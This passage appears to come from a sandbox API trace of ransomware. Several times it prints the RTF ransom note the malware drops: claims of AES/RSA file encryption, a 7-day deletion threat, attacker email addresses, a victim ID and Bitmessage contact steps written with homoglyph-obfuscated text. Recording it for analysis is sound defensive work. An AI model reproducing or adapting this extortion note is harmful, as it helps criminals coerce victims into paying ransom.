\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 